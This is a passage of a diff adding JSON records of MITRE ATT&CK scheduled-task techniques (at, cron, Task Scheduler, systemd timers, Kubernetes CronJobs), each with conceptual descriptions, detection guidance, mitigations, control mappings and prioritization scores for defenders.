+        ],
+        "is_subtechnique": true,
+        "supertechnique": "T1052",
+        "subtechniques": [],
+        "mitigations": [
+            {
+                "mid": "M1057",
+                "name": "Data Loss Prevention",
+                "description": "Use a data loss prevention (DLP) strategy to categorize sensitive data, identify data formats indicative of personal identifiable information (PII), and restrict exfiltration of sensitive data.(Citation: PurpleSec Data Loss Prevention)",
+                "url": "https://attack.mitre.org/mitigations/M1057"
+            },
+            {
+                "mid": "M1042",
+                "name": "Disable or Remove Feature or Program",
+                "description": "Remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.",
+                "url": "https://attack.mitre.org/mitigations/M1042"
+            },
+            {
+                "mid": "M1034",
+                "name": "Limit Hardware Installation",
+                "description": "Block users or groups from installing or using unapproved hardware on systems, including USB devices.",
+                "url": "https://attack.mitre.org/mitigations/M1034"
+            }
+        ],
+        "cumulative_score": 0.3380952380952381,
+        "adjusted_score": 0.3380952380952381,
+        "has_car": false,
+        "has_sigma": false,
+        "has_es_siem": false,
+        "has_splunk": false,
+        "cis_controls": [
+            "2.3",
+            "2.5",
+            "4.1",
+            "10.3",
+            "18.3",
+            "18.5"
+        ],
+        "nist_controls": [
+            "AC-16",
+            "AC-2",
+            "AC-20",
+            "AC-23",
+            "AC-3",
+            "AC-6",
+            "CA-7",
+            "CM-2",
+            "CM-6",
+            "CM-7",
+            "CM-8",
+            "MP-7",
+            "RA-5",
+            "SA-8",
+            "SC-28",
+            "SC-41",
+            "SI-3",
+            "SI-4",
+            "SR-4"
+        ],
+        "process_coverage": true,
+        "network_coverage": false,
+        "file_coverage": true,
+        "cloud_coverage": false,
+        "hardware_coverage": true
+    },
+    {
+        "tid": "T1053",
+        "name": "Scheduled Task/Job",
+        "description": "Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically requires being a member of an admin or otherwise privileged group on the remote system.(Citation: TechNet Task Scheduler Security)\n\nAdversaries may use task scheduling to execute programs at system startup or on a scheduled basis for persistence. These mechanisms can also be abused to run a process under the context of a specified account (such as one with elevated permissions/privileges).",
+        "url": "https://attack.mitre.org/techniques/T1053",
+        "tactics": [
+            "Execution",
+            "Persistence",
+            "Privilege Escalation"
+        ],
+        "detection": "Monitor scheduled task creation from common utilities using command-line invocation. Legitimate scheduled tasks may be created during installation of new software or through system administration functions. Look for changes to tasks that do not correlate with known software, patch cycles, etc. \n\nSuspicious program execution through scheduled tasks may show up as outlier processes that have not been seen before when compared against historical data. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement.",
+        "platforms": [
+            "Containers",
+            "Linux",
+            "Windows",
+            "macOS"
+        ],
+        "data_sources": [
+            "Command: Command Execution",
+            "Container: Container Creation",
+            "File: File Creation",
+            "File: File Modification",
+            "Process: Process Creation",
+            "Scheduled Job: Scheduled Job Creation"
+        ],
+        "is_subtechnique": false,
+        "supertechnique": null,
+        "subtechniques": [
+            {
+                "tid": "T1053.001",
+                "name": "Scheduled Task/Job: At (Linux)",
+                "url": "https://attack.mitre.org/techniques/T1053/001",
+                "description": "Adversaries may abuse the [at](https://attack.mitre.org/software/S0110) utility to perform task scheduling for initial, recurring, or future execution of malicious code. The [at](https://attack.mitre.org/software/S0110) command within Linux operating systems enables administrators to schedule tasks.(Citation: Kifarunix - Task Scheduling in Linux)\n\nAn adversary may use [at](https://attack.mitre.org/software/S0110) in Linux environments to execute programs at system startup or on a scheduled basis for persistence. [at](https://attack.mitre.org/software/S0110) can also be abused to conduct remote Execution as part of Lateral Movement and or to run a process under the context of a specified account.\n\nAdversaries may also abuse [at](https://attack.mitre.org/software/S0110) to break out of restricted environments by using a task to spawn an interactive system shell or to run system commands. Similarly, [at](https://attack.mitre.org/software/S0110) may also be used for [Privilege Escalation](https://attack.mitre.org/tactics/TA0004) if the binary is allowed to run as superuser via sudo.(Citation: GTFObins at)",
+                "detection": "Monitor scheduled task creation using command-line invocation. Legitimate scheduled tasks may be created during installation of new software or through system administration functions. Look for changes to tasks that do not correlate with known software, patch cycles, etc. \n\nReview all jobs using the atq command and ensure IP addresses stored in the SSH_CONNECTION and SSH_CLIENT variables, machines that created the jobs, are trusted hosts. All [at](https://attack.mitre.org/software/S0110) jobs are stored in /var/spool/cron/atjobs/.(Citation: rowland linux at 2019)\n\nSuspicious program execution through scheduled tasks may show up as outlier processes that have not been seen before when compared against historical data. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement.",
+                "mitigations": [
+                    {
+                        "mid": "M1047",
+                        "name": "Audit",
+                        "description": "Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.",
+                        "url": "https://attack.mitre.org/mitigations/M1047"
+                    },
+                    {
+                        "mid": "M1018",
+                        "name": "User Account Management",
+                        "description": "Manage the creation, modification, use, and permissions associated to user accounts.",
+                        "url": "https://attack.mitre.org/mitigations/M1018"
+                    }
+                ]
+            },
+            {
+                "tid": "T1053.002",
+                "name": "Scheduled Task/Job: At (Windows)",
+                "url": "https://attack.mitre.org/techniques/T1053/002",
+                "description": "Adversaries may abuse the at.exe utility to perform task scheduling for initial or recurring execution of malicious code. The [at](https://attack.mitre.org/software/S0110) utility exists as an executable within Windows for scheduling tasks at a specified time and date. Using [at](https://attack.mitre.org/software/S0110) requires that the Task Scheduler service be running, and the user to be logged on as a member of the local Administrators group. \n\nAn adversary may use at.exe in Windows environments to execute programs at system startup or on a scheduled basis for persistence. [at](https://attack.mitre.org/software/S0110) can also be abused to conduct remote Execution as part of Lateral Movement and or to run a process under the context of a specified account (such as SYSTEM).\n\nNote: The at.exe command line utility has been deprecated in current versions of Windows in favor of schtasks.",
+                "detection": "Monitor process execution from the svchost.exe in Windows 10 and the Windows Task Scheduler taskeng.exe for older versions of Windows. (Citation: Twitter Leoloobeek Scheduled Task) If scheduled tasks are not used for persistence, then the adversary is likely to remove the task when the action is complete. Monitor Windows Task Scheduler stores in %systemroot%\\System32\\Tasks for change entries related to scheduled tasks that do not correlate with known software, patch cycles, etc.\n\nConfigure event logging for scheduled task creation and changes by enabling the \"Microsoft-Windows-TaskScheduler/Operational\" setting within the event logging service. (Citation: TechNet Forum Scheduled Task Operational Setting) Several events will then be logged on scheduled task activity, including: (Citation: TechNet Scheduled Task Events)(Citation: Microsoft Scheduled Task Events Win10)\n\n* Event ID 106 on Windows 7, Server 2008 R2 - Scheduled task registered\n* Event ID 140 on Windows 7, Server 2008 R2 / 4702 on Windows 10, Server 2016 - Scheduled task updated\n* Event ID 141 on Windows 7, Server 2008 R2 / 4699 on Windows 10, Server 2016 - Scheduled task deleted\n* Event ID 4698 on Windows 10, Server 2016 - Scheduled task created\n* Event ID 4700 on Windows 10, Server 2016 - Scheduled task enabled\n* Event ID 4701 on Windows 10, Server 2016 - Scheduled task disabled\n\nTools such as Sysinternals Autoruns may also be used to detect system changes that could be attempts at persistence, including listing current scheduled tasks. (Citation: TechNet Autoruns)\n\nRemote access tools with built-in features may interact directly with the Windows API to perform these functions outside of typical system utilities. Tasks may also be created through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001), so additional logging may need to be configured to gather the appropriate data.",
+                "mitigations": [
+                    {
+                        "mid": "M1047",
+                        "name": "Audit",
+                        "description": "Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.",
+                        "url": "https://attack.mitre.org/mitigations/M1047"
+                    },
+                    {
+                        "mid": "M1028",
+                        "name": "Operating System Configuration",
+                        "description": "Make configuration changes related to the operating system or a common feature of the operating system that result in system hardening against techniques.",
+                        "url": "https://attack.mitre.org/mitigations/M1028"
+                    },
+                    {
+                        "mid": "M1026",
+                        "name": "Privileged Account Management",
+                        "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.",
+                        "url": "https://attack.mitre.org/mitigations/M1026"
+                    },
+                    {
+                        "mid": "M1018",
+                        "name": "User Account Management",
+                        "description": "Manage the creation, modification, use, and permissions associated to user accounts.",
+                        "url": "https://attack.mitre.org/mitigations/M1018"
+                    }
+                ]
+            },
+            {
+                "tid": "T1053.003",
+                "name": "Scheduled Task/Job: Cron",
+                "url": "https://attack.mitre.org/techniques/T1053/003",
+                "description": "Adversaries may abuse the cron utility to perform task scheduling for initial or recurring execution of malicious code.(Citation: 20 macOS Common Tools and Techniques) The cron utility is a time-based job scheduler for Unix-like operating systems.  The  crontab file contains the schedule of cron entries to be run and the specified times for execution. Any crontab files are stored in operating system-specific file paths.\n\nAn adversary may use cron in Linux or Unix environments to execute programs at system startup or on a scheduled basis for persistence. ",
+                "detection": "Monitor scheduled task creation from common utilities using command-line invocation. Legitimate scheduled tasks may be created during installation of new software or through system administration functions. Look for changes to tasks that do not correlate with known software, patch cycles, etc.  \n\nSuspicious program execution through scheduled tasks may show up as outlier processes that have not been seen before when compared against historical data. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement. ",
+                "mitigations": [
+                    {
+                        "mid": "M1047",
+                        "name": "Audit",
+                        "description": "Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.",
+                        "url": "https://attack.mitre.org/mitigations/M1047"
+                    },
+                    {
+                        "mid": "M1018",
+                        "name": "User Account Management",
+                        "description": "Manage the creation, modification, use, and permissions associated to user accounts.",
+                        "url": "https://attack.mitre.org/mitigations/M1018"
+                    }
+                ]
+            },
+            {
+                "tid": "T1053.005",
+                "name": "Scheduled Task/Job: Scheduled Task",
+                "url": "https://attack.mitre.org/techniques/T1053/005",
+                "description": "Adversaries may abuse the Windows Task Scheduler to perform task scheduling for initial or recurring execution of malicious code. There are multiple ways to access the Task Scheduler in Windows. The schtasks can be run directly on the command line, or the Task Scheduler can be opened through the GUI within the Administrator Tools section of the Control Panel. In some cases, adversaries have used a .NET wrapper for the Windows Task Scheduler, and alternatively, adversaries have used the Windows netapi32 library to create a scheduled task.\n\nThe deprecated [at](https://attack.mitre.org/software/S0110) utility could also be abused by adversaries (ex: [At (Windows)](https://attack.mitre.org/techniques/T1053/002)), though at.exe can not access tasks created with schtasks or the Control Panel.\n\nAn adversary may use Windows Task Scheduler to execute programs at system startup or on a scheduled basis for persistence. The Windows Task Scheduler can also be abused to conduct remote Execution as part of Lateral Movement and or to run a process under the context of a specified account (such as SYSTEM).",
+                "detection": "Monitor process execution from the svchost.exe in Windows 10 and the Windows Task Scheduler taskeng.exe for older versions of Windows. (Citation: Twitter Leoloobeek Scheduled Task) If scheduled tasks are not used for persistence, then the adversary is likely to remove the task when the action is complete. Monitor Windows Task Scheduler stores in %systemroot%\\System32\\Tasks for change entries related to scheduled tasks that do not correlate with known software, patch cycles, etc.\n\nConfigure event logging for scheduled task creation and changes by enabling the \"Microsoft-Windows-TaskScheduler/Operational\" setting within the event logging service. (Citation: TechNet Forum Scheduled Task Operational Setting) Several events will then be logged on scheduled task activity, including: (Citation: TechNet Scheduled Task Events)(Citation: Microsoft Scheduled Task Events Win10)\n\n* Event ID 106 on Windows 7, Server 2008 R2 - Scheduled task registered\n* Event ID 140 on Windows 7, Server 2008 R2 / 4702 on Windows 10, Server 2016 - Scheduled task updated\n* Event ID 141 on Windows 7, Server 2008 R2 / 4699 on Windows 10, Server 2016 - Scheduled task deleted\n* Event ID 4698 on Windows 10, Server 2016 - Scheduled task created\n* Event ID 4700 on Windows 10, Server 2016 - Scheduled task enabled\n* Event ID 4701 on Windows 10, Server 2016 - Scheduled task disabled\n\nTools such as Sysinternals Autoruns may also be used to detect system changes that could be attempts at persistence, including listing current scheduled tasks. (Citation: TechNet Autoruns)\n\nRemote access tools with built-in features may interact directly with the Windows API to perform these functions outside of typical system utilities. Tasks may also be created through Windows system management tools such as Windows Management Instrumentation and PowerShell, so additional logging may need to be configured to gather the appropriate data.",
+                "mitigations": [
+                    {
+                        "mid": "M1047",
+                        "name": "Audit",
+                        "description": "Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.",
+                        "url": "https://attack.mitre.org/mitigations/M1047"
+                    },
+                    {
+                        "mid": "M1028",
+                        "name": "Operating System Configuration",
+                        "description": "Make configuration changes related to the operating system or a common feature of the operating system that result in system hardening against techniques.",
+                        "url": "https://attack.mitre.org/mitigations/M1028"
+                    },
+                    {
+                        "mid": "M1026",
+                        "name": "Privileged Account Management",
+                        "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.",
+                        "url": "https://attack.mitre.org/mitigations/M1026"
+                    },
+                    {
+                        "mid": "M1018",
+                        "name": "User Account Management",
+                        "description": "Manage the creation, modification, use, and permissions associated to user accounts.",
+                        "url": "https://attack.mitre.org/mitigations/M1018"
+                    }
+                ]
+            },
+            {
+                "tid": "T1053.006",
+                "name": "Scheduled Task/Job: Systemd Timers",
+                "url": "https://attack.mitre.org/techniques/T1053/006",
+                "description": "Adversaries may abuse systemd timers to perform task scheduling for initial or recurring execution of malicious code. Systemd timers are unit files with file extension .timer that control services. Timers can be set to run on a calendar event or after a time span relative to a starting point. They can be used as an alternative to [Cron](https://attack.mitre.org/techniques/T1053/003) in Linux environments.(Citation: archlinux Systemd Timers Aug 2020) Systemd timers may be activated remotely via the systemctl command line utility, which operates over [SSH](https://attack.mitre.org/techniques/T1021/004).(Citation: Systemd Remote Control)\n\nEach .timer file must have a corresponding .service file with the same name, e.g., example.timer and example.service. .service files are [Systemd Service](https://attack.mitre.org/techniques/T1543/002) unit files that are managed by the systemd system and service manager.(Citation: Linux man-pages: systemd January 2014) Privileged timers are written to /etc/systemd/system/ and /usr/lib/systemd/system while user level are written to ~/.config/systemd/user/.\n\nAn adversary may use systemd timers to execute malicious code at system startup or on a scheduled basis for persistence.(Citation: Arch Linux Package Systemd Compromise BleepingComputer 10JUL2018)(Citation: gist Arch package compromise 10JUL2018)(Citation: acroread package compromised Arch Linux Mail 8JUL2018) Timers installed using privileged paths may be used to maintain root level persistence. Adversaries may also install user level timers to achieve user level persistence.",
+                "detection": "Systemd timer unit files may be detected by auditing file creation and modification events within the /etc/systemd/system, /usr/lib/systemd/system/, and ~/.config/systemd/user/ directories, as well as associated symbolic links. Suspicious processes or scripts spawned in this manner will have a parent process of ‘systemd’, a parent process ID of 1, and will usually execute as the ‘root’ user.\n\nSuspicious systemd timers can also be identified by comparing results against a trusted system baseline. Malicious systemd timers may be detected by using the systemctl utility to examine system wide timers: systemctl list-timers –all. Analyze the contents of corresponding .service files present on the file system and ensure that they refer to legitimate, expected executables.\n\nAudit the execution and command-line arguments of the 'systemd-run' utility as it may be used to create timers.(Citation: archlinux Systemd Timers Aug 2020)",
+                "mitigations": [
+                    {
+                        "mid": "M1026",
+                        "name": "Privileged Account Management",
+                        "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.",
+                        "url": "https://attack.mitre.org/mitigations/M1026"
+                    },
+                    {
+                        "mid": "M1022",
+                        "name": "Restrict File and Directory Permissions",
+                        "description": "Restrict access by setting directory and file permissions that are not specific to users or privileged accounts.",
+                        "url": "https://attack.mitre.org/mitigations/M1022"
+                    },
+                    {
+                        "mid": "M1018",
+                        "name": "User Account Management",
+                        "description": "Manage the creation, modification, use, and permissions associated to user accounts.",
+                        "url": "https://attack.mitre.org/mitigations/M1018"
+                    }
+                ]
+            },
+            {
+                "tid": "T1053.007",
+                "name": "Scheduled Task/Job: Container Orchestration Job",
+                "url": "https://attack.mitre.org/techniques/T1053/007",
+                "description": "Adversaries may abuse task scheduling functionality provided by container orchestration tools such as Kubernetes to schedule deployment of containers configured to execute malicious code. Container orchestration jobs run these automated tasks at a specific date and time, similar to cron jobs on a Linux system. Deployments of this type can also be configured to maintain a quantity of containers over time, automating the process of maintaining persistence within a cluster.\n\nIn Kubernetes, a CronJob may be used to schedule a Job that runs one or more containers to perform specific tasks.(Citation: Kubernetes Jobs)(Citation: Kubernetes CronJob) An adversary therefore may utilize a CronJob to schedule deployment of a Job that executes malicious code in various nodes within a cluster.(Citation: Threat Matrix for Kubernetes)",
+                "detection": "Monitor for the anomalous creation of scheduled jobs in container orchestration environments. Use logging agents on Kubernetes nodes and retrieve logs from sidecar proxies for application and resource pods to monitor malicious container orchestration job deployments. ",
+                "mitigations": [
+                    {
+                        "mid": "M1026",
+                        "name": "Privileged Account Management",
+                        "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.",
+                        "url": "https://attack.mitre.org/mitigations/M1026"
+                    },
+                    {
+                        "mid": "M1018",
+                        "name": "User Account Management",
+                        "description": "Manage the creation, modification, use, and permissions associated to user accounts.",
+                        "url": "https://attack.mitre.org/mitigations/M1018"
+                    }
+                ]
+            }
+        ],
+        "mitigations": [
+            {
+                "mid": "M1047",
+                "name": "Audit",
+                "description": "Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.",
+                "url": "https://attack.mitre.org/mitigations/M1047"
+            },
+            {
+                "mid": "M1028",
+                "name": "Operating System Configuration",
+                "description": "Make configuration changes related to the operating system or a common feature of the operating system that result in system hardening against techniques.",
+                "url": "https://attack.mitre.org/mitigations/M1028"
+            },
+            {
+                "mid": "M1026",
+                "name": "Privileged Account Management",
+                "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.",
+                "url": "https://attack.mitre.org/mitigations/M1026"
+            },
+            {
+                "mid": "M1018",
+                "name": "User Account Management",
+                "description": "Manage the creation, modification, use, and permissions associated to user accounts.",
+                "url": "https://attack.mitre.org/mitigations/M1018"
+            }
+        ],
+        "cumulative_score": 2.1142857142857143,
+        "adjusted_score": 2.1142857142857143,
+        "has_car": false,
+        "has_sigma": true,
+        "has_es_siem": true,
+        "has_splunk": true,
+        "cis_controls": [
+            "4.1",
+            "4.7",
+            "4.8",
+            "5.3",
+            "5.4",
+            "6.1",
+            "6.2",
+            "6.8",
+            "18.3",
+            "18.5"
+        ],
+        "nist_controls": [
+            "AC-2",
+            "AC-3",
+            "AC-5",
+            "AC-6",
+            "CA-8",
+            "CM-2",
+            "CM-5",
+            "CM-6",
+            "CM-7",
+            "CM-8",
+            "IA-2",
+            "IA-4",
+            "IA-8",
+            "RA-5",
+            "SI-4"
+        ],
+        "process_coverage": true,
+        "network_coverage": false,
+        "file_coverage": true,
+        "cloud_coverage": true,
+        "hardware_coverage": false,
+        "actionability_score": {
+            "combined_score": 0.5142857142857142,
+            "mitigation_score": 0.45454545454545453,
+            "detection_score": 0.58
+        },
+        "choke_point_score": 0.6,
+        "prevalence_score": 1
+    },
+    {
+        "tid": "T1053.001",
+        "name": "Scheduled Task/Job: At (Linux)",
+        "description": "Adversaries may abuse the [at](https://attack.mitre.org/software/S0110) utility to perform task scheduling for initial, recurring, or future execution of malicious code. The [at](https://attack.mitre.org/software/S0110) command within Linux operating systems enables administrators to schedule tasks.(Citation: Kifarunix - Task Scheduling in Linux)\n\nAn adversary may use [at](https://attack.mitre.org/software/S0110) in Linux environments to execute programs at system startup or on a scheduled basis for persistence. [at](https://attack.mitre.org/software/S0110) can also be abused to conduct remote Execution as part of Lateral Movement and or to run a process under the context of a specified account.\n\nAdversaries may also abuse [at](https://attack.mitre.org/software/S0110) to break out of restricted environments by using a task to spawn an interactive system shell or to run system commands. Similarly, [at](https://attack.mitre.org/software/S0110) may also be used for [Privilege Escalation](https://attack.mitre.org/tactics/TA0004) if the binary is allowed to run as superuser via sudo.(Citation: GTFObins at)",
+        "url": "https://attack.mitre.org/techniques/T1053/001",
+        "tactics": [
+            "Execution",
+            "Persistence",
+            "Privilege Escalation"
+        ],
+        "detection": "Monitor scheduled task creation using command-line invocation. Legitimate scheduled tasks may be created during installation of new software or through system administration functions. Look for changes to tasks that do not correlate with known software, patch cycles, etc. \n\nReview all jobs using the atq command and ensure IP addresses stored in the SSH_CONNECTION and SSH_CLIENT variables, machines that created the jobs, are trusted hosts. All [at](https://attack.mitre.org/software/S0110) jobs are stored in /var/spool/cron/atjobs/.(Citation: rowland linux at 2019)\n\nSuspicious program execution through scheduled tasks may show up as outlier processes that have not been seen before when compared against historical data. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement.",
+        "platforms": [
+            "Linux"
+        ],
+        "data_sources": [
+            "Command: Command Execution",
+            "Process: Process Creation",
+            "Scheduled Job: Scheduled Job Creation"
+        ],
+        "is_subtechnique": true,
+        "supertechnique": "T1053",
+        "subtechniques": [],
+        "mitigations": [
+            {
+                "mid": "M1047",
+                "name": "Audit",
+                "description": "Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.",
+                "url": "https://attack.mitre.org/mitigations/M1047"
+            },
+            {
+                "mid": "M1018",
+                "name": "User Account Management",
+                "description": "Manage the creation, modification, use, and permissions associated to user accounts.",
+                "url": "https://attack.mitre.org/mitigations/M1018"
+            }
+        ],
+        "cumulative_score": 0.3952380952380953,
+        "adjusted_score": 0.3952380952380953,
+        "has_car": true,
+        "has_sigma": true,
+        "has_es_siem": false,
+        "has_splunk": true,
+        "cis_controls": [
+            "4.7",
+            "5.3",
+            "5.4",
+            "6.1",
+            "6.2",
+            "6.8",
+            "8.1",
+            "8.11",
+            "8.2",
+            "8.3",
+            "8.5",
+            "8.9",
+            "18.3",
+            "18.5",
+            "8.10"
+        ],
+        "nist_controls": [
+            "AC-2",
+            "AC-3",
+            "AC-5",
+            "AC-6",
+            "CA-8",
+            "CM-5",
+            "IA-2",
+            "RA-5",
+            "SI-4"
+        ],
+        "process_coverage": true,
+        "network_coverage": false,
+        "file_coverage": true,
+        "cloud_coverage": false,
+        "hardware_coverage": false
+    },
+    {
+        "tid": "T1053.002",
+        "name": "Scheduled Task/Job: At (Windows)",
+        "description": "Adversaries may abuse the at.exe utility to perform task scheduling for initial or recurring execution of malicious code. The [at](https://attack.mitre.org/software/S0110) utility exists as an executable within Windows for scheduling tasks at a specified time and date. Using [at](https://attack.mitre.org/software/S0110) requires that the Task Scheduler service be running, and the user to be logged on as a member of the local Administrators group. \n\nAn adversary may use at.exe in Windows environments to execute programs at system startup or on a scheduled basis for persistence. [at](https://attack.mitre.org/software/S0110) can also be abused to conduct remote Execution as part of Lateral Movement and or to run a process under the context of a specified account (such as SYSTEM).\n\nNote: The at.exe command line utility has been deprecated in current versions of Windows in favor of schtasks.",
+        "url": "https://attack.mitre.org/techniques/T1053/002",
+        "tactics": [
+            "Execution",
+            "Persistence",
+            "Privilege Escalation"
+        ],
+        "detection": "Monitor process execution from the svchost.exe in Windows 10 and the Windows Task Scheduler taskeng.exe for older versions of Windows. (Citation: Twitter Leoloobeek Scheduled Task) If scheduled tasks are not used for persistence, then the adversary is likely to remove the task when the action is complete. Monitor Windows Task Scheduler stores in %systemroot%\\System32\\Tasks for change entries related to scheduled tasks that do not correlate with known software, patch cycles, etc.\n\nConfigure event logging for scheduled task creation and changes by enabling the \"Microsoft-Windows-TaskScheduler/Operational\" setting within the event logging service. (Citation: TechNet Forum Scheduled Task Operational Setting) Several events will then be logged on scheduled task activity, including: (Citation: TechNet Scheduled Task Events)(Citation: Microsoft Scheduled Task Events Win10)\n\n* Event ID 106 on Windows 7, Server 2008 R2 - Scheduled task registered\n* Event ID 140 on Windows 7, Server 2008 R2 / 4702 on Windows 10, Server 2016 - Scheduled task updated\n* Event ID 141 on Windows 7, Server 2008 R2 / 4699 on Windows 10, Server 2016 - Scheduled task deleted\n* Event ID 4698 on Windows 10, Server 2016 - Scheduled task created\n* Event ID 4700 on Windows 10, Server 2016 - Scheduled task enabled\n* Event ID 4701 on Windows 10, Server 2016 - Scheduled task disabled\n\nTools such as Sysinternals Autoruns may also be used to detect system changes that could be attempts at persistence, including listing current scheduled tasks. (Citation: TechNet Autoruns)\n\nRemote access tools with built-in features may interact directly with the Windows API to perform these functions outside of typical system utilities. Tasks may also be created through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001), so additional logging may need to be configured to gather the appropriate data.",
+        "platforms": [
+            "Windows"
+        ],
+        "data_sources": [
+            "Command: Command Execution",
+            "File: File Modification",
+            "Process: Process Creation",
+            "Scheduled Job: Scheduled Job Creation"
+        ],
+        "is_subtechnique": true,
+        "supertechnique": "T1053",
+        "subtechniques": [],
+        "mitigations": [
+            {
+                "mid": "M1047",
+                "name": "Audit",
+                "description": "Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.",
+                "url": "https://attack.mitre.org/mitigations/M1047"
+            },
+            {
+                "mid": "M1028",
+                "name": "Operating System Configuration",
+                "description": "Make configuration changes related to the operating system or a common feature of the operating system that result in system hardening against techniques.",
+                "url": "https://attack.mitre.org/mitigations/M1028"
+            },
+            {
+                "mid": "M1026",
+                "name": "Privileged Account Management",
+                "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.",
+                "url": "https://attack.mitre.org/mitigations/M1026"
+            },
+            {
+                "mid": "M1018",
+                "name": "User Account Management",
+                "description": "Manage the creation, modification, use, and permissions associated to user accounts.",
+                "url": "https://attack.mitre.org/mitigations/M1018"
+            }
+        ],
+        "cumulative_score": 0.40476190476190477,
+        "adjusted_score": 0.40476190476190477,
+        "has_car": true,
+        "has_sigma": true,
+        "has_es_siem": false,
+        "has_splunk": true,
+        "cis_controls": [
+            "4.1",
+            "4.7",
+            "4.8",
+            "5.3",
+            "5.4",
+            "6.1",
+            "6.2",
+            "6.8",
+            "8.3",
+            "18.3",
+            "18.5"
+        ],
+        "nist_controls": [
+            "AC-2",
+            "AC-3",
+            "AC-5",
+            "AC-6",
+            "CA-8",
+            "CM-2",
+            "CM-5",
+            "CM-6",
+            "CM-7",
+            "CM-8",
+            "IA-2",
+            "IA-4",
+            "RA-5",
+            "SI-4"
+        ],
+        "process_coverage": true,
+        "network_coverage": false,
+        "file_coverage": true,
+        "cloud_coverage": false,
+        "hardware_coverage": false
+    },
+    {
+        "tid": "T1053.003",
+        "name": "Scheduled Task/Job: Cron",
+        "description": "Adversaries may abuse the cron utility to perform task scheduling for initial or recurring execution of malicious code.(Citation: 20 macOS Common Tools and Techniques) The cron utility is a time-based job scheduler for Unix-like operating systems.  The  crontab file contains the schedule of cron entries to be run and the specified times for execution. Any crontab files are stored in operating system-specific file paths.\n\nAn adversary may use cron in Linux or Unix environments to execute programs at system startup or on a scheduled basis for persistence. ",
+        "url": "https://attack.mitre.org/techniques/T1053/003",
+        "tactics": [
+            "Execution",
+            "Persistence",
+            "Privilege Escalation"
+        ],
+        "detection": "Monitor scheduled task creation from common utilities using command-line invocation. Legitimate scheduled tasks may be created during installation of new software or through system administration functions. Look for changes to tasks that do not correlate with known software, patch cycles, etc.  \n\nSuspicious program execution through scheduled tasks may show up as outlier processes that have not been seen before when compared against historical data. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement. ",
+        "platforms": [
+            "Linux",
+            "macOS"
+        ],
+        "data_sources": [
+            "Command: Command Execution",
+            "File: File Modification",
+            "Process: Process Creation",
+            "Scheduled Job: Scheduled Job Creation"
+        ],
+        "is_subtechnique": true,
+        "supertechnique": "T1053",
+        "subtechniques": [],
+        "mitigations": [
+            {
+                "mid": "M1047",
+                "name": "Audit",
+                "description": "Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.",
+                "url": "https://attack.mitre.org/mitigations/M1047"
+            },
+            {
+                "mid": "M1018",
+                "name": "User Account Management",
+                "description": "Manage the creation, modification, use, and permissions associated to user accounts.",
+                "url": "https://attack.mitre.org/mitigations/M1018"
+            }
+        ],
+        "cumulative_score": 0.4,
+        "adjusted_score": 0.4,
+        "has_car": false,
+        "has_sigma": true,
+        "has_es_siem": true,
+        "has_splunk": true,
+        "cis_controls": [
+            "4.7",
+            "5.3",
+            "5.4",
+            "6.1",
+            "6.2",
+            "6.8",
+            "8.1",
+            "8.11",
+            "8.2",
+            "8.5",
+            "8.9",
+            "18.3",
+            "18.5",
+            "8.10"
+        ],
+        "nist_controls": [
+            "AC-2",
+            "AC-3",
+            "AC-5",
+            "AC-6",
+            "CA-8",
+            "CM-5",
+            "IA-2",
+            "RA-5",
+            "SI-4"
+        ],
+        "process_coverage": true,
+        "network_coverage": false,
+        "file_coverage": true,
+        "cloud_coverage": false,
+        "hardware_coverage": false
+    },
+    {
+        "tid": "T1053.005",
+        "name": "Scheduled Task/Job: Scheduled Task",
+        "description": "Adversaries may abuse the Windows Task Scheduler to perform task scheduling for initial or recurring execution of malicious code. There are multiple ways to access the Task Scheduler in Windows. The schtasks can be run directly on the command line, or the Task Scheduler can be opened through the GUI within the Administrator Tools section of the Control Panel. In some cases, adversaries have used a .NET wrapper for the Windows Task Scheduler, and alternatively, adversaries have used the Windows netapi32 library to create a scheduled task.\n\nThe deprecated [at](https://attack.mitre.org/software/S0110) utility could also be abused by adversaries (ex: [At (Windows)](https://attack.mitre.org/techniques/T1053/002)), though at.exe can not access tasks created with schtasks or the Control Panel.\n\nAn adversary may use Windows Task Scheduler to execute programs at system startup or on a scheduled basis for persistence. The Windows Task Scheduler can also be abused to conduct remote Execution as part of Lateral Movement and or to run a process under the context of a specified account (such as SYSTEM).",
+        "url": "https://attack.mitre.org/techniques/T1053/005",
+        "tactics": [
+            "Execution",
+            "Persistence",
